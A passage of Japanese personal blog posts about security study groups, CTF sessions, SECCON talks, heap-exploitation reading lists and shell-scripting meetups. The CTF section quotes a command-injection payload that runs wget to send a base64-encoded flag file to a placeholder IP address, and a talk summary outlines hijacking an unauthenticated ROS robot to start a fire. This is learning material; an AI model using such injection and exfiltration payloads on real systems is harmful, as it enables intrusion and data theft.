セキュリティ関係は事前にチェックしていたので、気になってました。私が初購買者だそうで、光栄でございます。ゆっくり読ませて頂きます!しかも100円だった。良心的。

今年のオライリーさん

今までのオライリーの全書籍が入ってたとすると、紙で買うと160万円するので、60万円くらいお得ですね!!

ちょっとシェル芸で確認してみましょう。

$ curl -s  http://www.oreilly.co.jp/catalog/index.html|grep price|wc -l
467
$ curl -s  http://www.oreilly.co.jp/catalog/index.html|grep price|cut -d'>' -f9|cut -d' ' -f1|tr -d ',th<'|tr '\n' '+'|sed -e 's/$/0/g'|cut -c2-|bc
1604880

という訳で、2017.4.9時点だど、467書籍あって、合計160万4880円でした。
そのCDに全部入ってるとすると、なんと!60万4880円お得!やりますねオライリー!買わんけど。

参考 オライリー・ジャパンの書籍全部買ったら、おいくらになるか俺の中で話題

フロッピーのフィギュアと煎餅

20170409_techbookfest2_2.jpg

懐かしの3.5インチFDの奥に見えるのは5インチのFDか。。。みんな物持ちいいなぁ。

Javaで使ってるクラスがスレッドセーフなのかスレッドアンセーフなのか調べる

kanata約7年前に追加

Javaって、使ってるクラスがスレッドセーフなのかスレッドアンセーフなのか、JavaDocとか見て地道に調べるしかないん?
そう言われれば、Javaってスレッドアンセーフとかそんなに気にしてなかったな。。
singletonなインスタンス変数に、複数スレッドからwriteするような場合だけ、synchronizedつけるかどうか、気にするぐらいで済むからかな?

スレッドアンセーフかどうか調べる

JavaDockから、"スレッド"という単語が含まれている文を抜き出す。簡単だけど、それでだいたい判断できる。
シェル芸でやってみた。Qの変数にクラス名を設定する。

$ Q="StringBuffer";P=`curl -s -L http://docs.oracle.com/javase/jp/7/api/overview-tree.html|grep /$Q.html|awk -F'"' '{print $4}'`;curl -s -L http://docs.oracle.com/javase/jp/7/api/$P|sed 's/<[^>]*>//g'|grep "スレッド"
スレッドセーフな可変の文字列。文字列バッファーは String に似ていますが、変更できる点が異なります。文字列バッファーには常に文字列が格納されていますが、文字列の長さと内容は特定のメソッドの呼び出しにより変更できます。
文字列バッファーは複数のスレッドによって安全に使用することができます。メソッドは必要に応じて同期化され、特定のインスタンスでのすべてのオペレーションが、関連のある個々のスレッドによって行われるメソッドの呼び出しの順序と一致する連続した順序で発生するように動作します。
 JDK 5 以降、このクラスは単一のスレッド StringBuilder により使用されるよう設計された等価のクラスで補足されています。 StringBuilder クラスは、このクラスと同じ処理をすべてサポートしながらも高速であり、同期を実行しないので、通常はこのクラスに優先して使用される必要があります。

スレッドアンセーフを気をつけなきゃいけないクラス一覧

ともあれ、一覧を作ってみたので晒す。
作ってみたものの・・・実用的には「う~ん」な感じだけれど。

以下参照

当ページのWiki Java - Appendix スレッドセーフ・スレッドアンセーフについて

katagaitai CTF勉強会#7 #8 - 関東|med に参加してきました

kanata約7年前に追加

脳が疲れたww
良い勉強会でございました。

katagaitai CTF勉強会 #7 - 関東|med : ATND
katagaitai CTF勉強会 #8 - 関東|med : ATND

trmrさんの部

ナップサック暗号!どういうものか解った!(解けるとは言っていない)

結論:MHナップサック暗号は、CTF的にいうと数パターンしかない。SageMathとか使って、LLLアルゴリズムでぶん殴れ!!!


あと、「(たぶん)日本で一番早いSHA-1衝突の勉強会」をしてくださいました。私が理解したポイントは・・・

  • マークス・ティーブンスはハッシュ衝突界のガチの人
  • 暗号屋さん的には予測の範囲内(前々回の勉強会でもtrmrさんが触れてた)
  • MD5から13年も破られてない。似たような構造の割にけっこう持ったという印象らしい。
  • GPU110個使って、1年間ぶん回して衝突させた(それでも、計算量は総当りよりは10万分の1で済んだ)
  • クラウドに換算すると11万ドル程かかる
  • Googleさんは、90日後に全てを明らかにすると言っている。さぁ、90日間のハッシュ衝突CTFの開催だ!

yskさんの部

2016年度のSECCON SECCON TOWERこと腕木通信の塔 しかり、ハードウェア系は「あ、こりゃダメだわ、完全に解けない領域に入ったわ」と思って、そっ閉じしてたんだけど、、

根気さえあれば解けるということが解った!!回路図を起こすのが、なんというか、すごいなコレ・・・
さすが、400点の価値はある。

神は最初にNANDを作り、それからORとかXORとかANDとかNOTとかいろいろ作った。

NANDの組み合わせで、全ての論理回路が実現できるという事を知ってれば、わりと解答に早く辿り着けるんだね。面白い問題だわ・・・

takさんの部

これ、とても良い資料でした。公開、期待しています!!
小さいバイナリながら、Pwnに必要な要素(bss領域のオーバーフローかーらーのー)が随所に仕込まれているので、これは大変勉強になる問題ですね!

ちょっと面白いバックコネクトの方法を紹介して頂きました。

CMD = ";wget http://999.999.999.999/\$(cat flag|base64);sleep 10;"

自前のWebサーバを持っていれば、404と共にフラグがアクセスログに記録される。CTFだとflagさえ読めればいいので、無理にシェルでバックコネクトしなくてもいいし、楽かも。

bataさんの部

怒涛の337ページ・・・っ!!5時間ほどぶっ続けで喋るbataさん・・・っ

PEとELFを比較して説明してくれていて、Windowsのセキュリティ機構を整理して説明していて、かつ、複雑なヒープの話を説明してかつ、exploitまで書いちゃおうという・・・すごい資料。すごい資料ヤバイ。

これだけで参考書一冊二冊の情報量を超えているので、脳が死にましたw

これはもー、あとからゆっくり拝読させて頂きます。だいぶWindowsとPEに詳しくなれたような気がしてきました。

Windowsのセキュリティ機構って、意外にしっかりしてました。今のWindowsなら、バッファオーバーフローの脆弱性をついてシェルを奪取するって、かなり難しいんじゃないかな。。少なくともLinuxよりも難しい気がします。


スライドの中にも各種ツールの紹介がありますが、昔、Windowsでマルウェアの挙動とかを調べるツールを教えて貰ったことがあるので、参考までにご紹介しておきます。

bataさんからも紹介してもらってましたが、特にAPI Monitorが、ものすごい便利そうです。

産学連携セミナー インシデントレスポンス概論 を受講してきました

頂き物

メモ帳もらったよ!!ありがたく使わせて頂きます。

20170225_katagaitaictf_1.jpg

余談

新ホワイトハッカ飴3000缶wwwww
待ってます。

第27回sedこわいシェル芸勉強会に参加させて頂きました!

kanata約7年前に追加

シェルスクリプト大好きなんですが、毎回新しい知見が得られて、やっぱり面白いですね!
今回はsedでした。
sedの奥深さにやられて、模範解答以上にうまく書けた解答がなかった(吐血)ので、自分用のメモ用に関連情報を載せておきたいと思います。
ほんとsedって置換でしか使ってなかったよ。。


【問題と解答】第27回sedこわいシェル芸勉強会


togetterが1000tweet超えてる。そりゃトレンド入りするわwww

第27回sedこわいシェル芸勉強会

Youtube

第27回シェル芸勉強会(午前/鳥海)
https://www.youtube.com/watch?v=oeNFq5t_frc

第27回シェル芸勉強会(午前2/石井)
https://www.youtube.com/watch?v=cDt2Olr0x84

第27回シェル芸勉強会
https://www.youtube.com/watch?v=BXM4pmvxrq4

その他、知見メモ

  • sedはヤバイ。ループも分岐もできる。
  • sedはヤバイ。特にパターンホルダとプレースホルダがヤバイ。クリップボードにコピペするイメージで使える。
  • 難読化シェル芸が意外に認知されてる。ヤバイ。
  • 最後のLTは、毎回面白いので臆せず参加したほうが良い。ヤバイ。
  • 怪物曲線ヤバイ。まったく読めないがちゃんと動く。ターミナルに曲線が書かれる。ヤバイ。

最後にフリー素材となった横田さんをどうぞ!

20170211_shellgei.jpg

濱⛵せっく 出張版 #2 に参加させて頂きました

kanata約7年前に追加

普段は仕事の都合により平日の勉強会は、ほぼ出れないんですが、今回は都合がついたので「濱⛵せっく」に参加させて頂きました!

  • 濱⛵せっく とは
横濱界隈のセキュリティエンジニアが運営している情報やスキルを共有し合うことを目標とするセキュリティ勉強会です。
セキュリティに興味のある方であれば、学生でも社会人でも無職の方でもどなたでも大歓迎です。
なお、横濱にお住まいでなくても参加できます。

濱せっく 出張版 #2 (2017/02/08 19:00〜)

濱⛵せっく 出張版 #2

漏洩情報漁り的何か

漏洩したアカウント情報。漏洩してもパスワードはハッシュ化されてて読めない大丈夫・・・なわけないですよねwというお話。
Splunk使っている所を初めて見ました。ログ解析には、なんかとても便利そう!

【ハンズオン】無償ツールでできるマルウェア解析101 ~にじみ出る悪意を捉えよ~

ShinoBOTの@Sh1n0g1さんですよ!!

特に以下が興味深かったです。

  • ファジーハッシュ

バイナリの類似性を見るのに使う。通常1bitでも違えばハッシュ値は全く違うものになるが、ファジーハッシュの場合は、そんなに変化がないという話。ssdeepというソフトがあるらしい。バイナリの類似度が解る。

  • その類似度を可視化する自作ツールの紹介。カッコよく可視化されてた。

  • マルウェアのいろいろな情報を調査するCTFを公開してくれた。後ほど問いてみたい~。

攻撃のモニタリングとライブディフェンス的な戦い方の考察

Sysmonという便利ツールを紹介してくださいました。

Sysmonは、Windowsのトラブルシューティング用の63のツール「Sysinternal Suite」に含まれているものです。
私の記憶だと「儂の波動球(ツール)は六十三式まであるぞ」だと思ってたんですが、今だともっと増えてるのかな?

これ動かしておくと、ほんとRATの挙動が手に取るようにわかりますね。。

SECCON 2016 決勝大会・カンファレンスに行きました!

kanata約7年前に追加

金曜・土曜・日曜と3日間ある内の土曜日に行ってきました。
(本当は金曜日とかも行きたかったんだけど仕事がね。。)

印象に残ったのを書きます。

SECCON 決勝

  • 今年は誰でも見学可能!
  • 友利奈緒のような二次元キャラはいなかった。
  • BoB珠玉の結晶である CyKor(韓国) が独走。ここ最近は韓国チームが強い。
  • プロ生ちゃん・・・?

世代別!なぜセキュリティエンジニアはセキュリティを志す(した)のか?

  • 正解は越後製菓の音(オフレコの合図)を乱発wwwww
  • ハッカージャパンが惜しい雑誌だった。復刊して欲しい世代です。
  • 人材育成にCTFは必要かという問い、なかなかに意義深い。

王様達のヴァイキング×SECCON スペシャルトークセッション

撮影厳禁。とても面白かった(こなみ)。
編集さん、漫画さん、作家さん、そして技術監修のお二人の見事な合作という事がわかり、ますますファンになりました。

Googleのエンジニアが技術監修。なるほどなるほど、技術面で精緻に出来てたのはこういうことかぁと納得。

ちになみに、これが本物の是枝くんのPCです。

20170128_seccon_1.jpg

ロボットのセキュリティは安全?ロボットをハッキングしてみよう!

  • ロボットはROSというOSの上で動かす事が多い(昔はZ80とかだったのに。。。時代ですなぁ。。)
  • ROSはベースのOSの上で動くmetaOSと呼ばれるもので、ベースにはUbuntuがよく使われるらしい。
  • ROSは認証なし。デフォルトのポート番号11311
  • ROSはXMLRPC。通信路の暗号化なし。そんな訳で、割と簡単に乗っ取りができる。

以下のコンボで、家を火事に出来るというシナリオを動画で再現してた。なるほど、近い将来ありえないこともないか。。

人の家のロボットを乗っ取り、ロボットのカメラで燃えやすいもの(ティッシュとか)を探す→ヒーターのスイッチを入れる(最近はIR 赤外線で電源が入る)→ロボットで燃えやすいものをヒーターに近づける。

  • ROS2が開発中らしく、セキュリティ面は、これでだいぶリスクが減らせそうである。

その他

パーカーとTシャツを買った。
身につけることによって、サンシャイン池崎ばりのテンションに上げることが出来ると思う。

20170128_seccon_2.jpg

空前絶後のォォ!!!

新春 heap情報まとめ (2コメント)

kanata約7年前に追加

昨年は時間をみて、heapの勉強しておりましたが、これ、heapで軽く本が1冊書けるぐらいの内容です。
CTFのPwnジャンルが解ける人が少ないのは、ひとえにこのheap仕様の難解さが原因の一つでしょう。

いつか、heapに関してまとめようと思ってるんだけど。。何千文字かになりそう。

そんな訳で、私が参照させて頂いている&これから参照したい情報を以下にまとめました。

よくわかる!heapの基礎的(!?)な知識

mallocの旅(glibc編)
http://www.slideshare.net/kosaki55tea/glibc-malloc

malloc(3)のメモリ管理構造
http://www.valinux.co.jp/technologylibrary/document/linux/malloc0001/

NEC 古賀さんによるありがたい解説
http://www.soi.wide.ad.jp/class/20040011/slides/19/45.html
https://www.nic.ad.jp/ja/materials/security-seminar/20041004/3-koga.pdf

The 67th Yokohama kernel reading party(小崎さんのmalloc動画)
https://www.youtube.com/watch?v=0-vWT-t0UHg

Pwn/Exploit heapにまつわる攻撃手法

The Malloc Maleficarum (Bugtraq 2005) - ももいろテクノロジー
http://inaz2.hatenablog.com/entry/2016/12/24/002138

heap exploitationテク走り書き - 生きたい
http://potetisensei.hatenablog.com/entry/2016/12/10/034804

House of Forceの概要と実践(題材:BCTF2016 bcloud) - Pwn d3 r1ng
http://pwn.hatenadiary.jp/entry/2016/12/05/235942

[CB16] House of Einherjar :GLIBC上の新たなヒープ活用テクニック
http://www.slideshare.net/codeblue_jp/cb16-matsukuma-ja-68459648

heapにまつわる脆弱性の実例等

たった1バイトの書き込みが引き起こすルート権限での実行の脆弱性 コンピュータサイエンス POSTD
http://postd.cc/a-single-byte-write-opened-a-root-execution-exploit/

情報セキュリティスペシャリスト試験を受けた話 - しゃろの日記
http://charo-it.hatenablog.jp/entry/2016/12/09/145231

CTFひとり勉強会 Secret Holder (HITCON 2016 Quals) 後編 - ヾノ>ㅅ<)ノシ帳
http://katc.hateblo.jp/entry/2016/10/28/124025

第26回シェル芸勉強会及びエクシェル芸勉強会に参加させて頂きました!

kanata7年以上前に追加

シェルスクリプト大好きなんですが、新しい知見が得られて、やっぱり面白いですね!
今回は、自分なりにうまく書けた解答がなかった(吐血)ので、自分用のメモ用に関連情報を載せておきたいと思います。

【問題と解答】第26回シェル芸勉強会及びエクシェル芸勉強会

jus共催 第8回初心者の方角に向いて講師が喋るシェル勉強会(初心者向けとは言ってない)/第26回シェル芸勉強会及びエクシェル芸勉強会

その他、知見メモ

  • ExcelやXMLをいい感じにアレコレするツールは沢山あるっぽいが、 xmllint と hxselect がよさげ。
  • シェルのviモードは、emacs宗派を改宗させる破戒力がある。ヤバイ。
  • Excelの文字列は、展開したファイルのxl/sharedStrings.xmlに順番に入っている(紐付けるIDとかは無い。XMLなのに)。ヤバイ。
  • penというコマンドでMarkdownのプレビューができる。sayは喋る。ヤバイ。

1 ... 5 6 7 8 9 ... 16 (61-70/151)

他の形式にエクスポート: Atom

クリップボードから画像を追加 (サイズの上限: 100 MB)